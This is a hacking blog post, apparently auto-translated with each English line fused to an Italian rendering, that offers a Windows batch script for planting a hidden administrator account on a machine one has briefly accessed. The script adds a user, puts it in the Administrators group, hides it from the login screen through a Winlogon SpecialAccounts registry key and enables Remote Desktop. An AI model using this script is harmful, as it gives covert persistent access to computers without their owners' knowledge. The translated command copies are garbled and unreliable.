How to make a Hidden Admin Account using bat Script ! Come fare un account amministratore Nascosto utilizzando script di pipistrello!
Hey guys i have been playing around with bat scripts and i found this small code that will let you create a admin account and hide it from the super admin. Ehi ragazzi, mi è stato giocare intorno con bat script e ho trovato questo piccolo codice che vi permetterà di creare un account amministratore e nascondere dal super amministratore. so in case you get a chance to access a box with admin status all you have to do is to copy this code to note pad and make the changes and save it as .bat and run it. così nel caso in cui si ottiene la possibilità di accedere a una casella con admin stato tutto ciò che dovete fare è copiare questo codice di Appunti e apportare le modifiche e salvarlo come. bat ed eseguirlo. and then you have your own admin account which is hidden :) {Original Code by Netanelj Credits goes to AgentSmith15 for the Dynamic codes} e poi hai il tuo account amministratore, che è nascosto:) (codice originale da Netanelj Credits va a AgentSmith15 per la dinamica codici)
@Echo Off @ Echo off
SET /P usr=[Enter new username here:] SET / usr P = [Inserire il nuovo nome utente qui:]
SET /P pwd=[Enter new password here:] SET / P = pwd [Invio nuova password qui:]
:: SET /P takes the user input and puts it into the variable. :: SET / P, porta l'utente di input e lo mette in variabile.
echo — Creating New User, “%usr%” with password “%pwd%” – echo - Creazione di un nuovo utente, "% usr%" con password "pwd%%" --
net user “%usr%” “%pwd%” /add net user "% usr%" "% pwd%" / add
echo — Adding User to Group Administrator – echo - Aggiunta di utente ad amministratore del gruppo --
net localgroup Administrators %usr% /add net localgroup amministratori%% usr / aggiungere
echo — User Is Now Administrator — >> echo - user è Adesso amministratore ->>
echo — Hidding User – echo - Hidding Utente --
REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v %usr% /t REG_DWORD /d 0 /f REG ADD HKLM \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList / v%% usr / t REG_DWORD / d 0 / f
echo — Activating Terminal Service – echo - Attivare Terminal Service --
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 REG ADD HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server / v fDenyTSConnections / t REG_DWORD / d 0
echo — Activating Terminal Service Done – echo - Attivare Terminal Service Fatto --
SET /P =Press Enter to continue . SET / P = Premere Invio per continuare. . .
Exit Esci
Copy this to notepad. Copia di questo blocco note. save it as install.bat run it. salvarlo come install.bat eseguirlo.
Enter your desired username & password. Inserisci il tuo nome utente desiderato e la password. done fatto ![]()
Written by magakos. Scritto da magakos. Read more great feeds at is source Per saperne di più grande al feed è fonte WEBSITE SITO WEB
no comments nessun commento . .
Read more articles on Per saperne di più articoli su Scripts Script and e WindowS HackS Windows Hacks and e All Tutto and e otherSoftware otherSoftware . .
- [+] Digg [+] Digg : Feature this article : Feature questo articolo
- [+] Del.icio.us [+] Del.icio.us : Bookmark this article : Aggiungi ai preferiti questo articolo
- [+] Furl [+] Furl : Bookmark this article : Aggiungi ai preferiti questo articolo















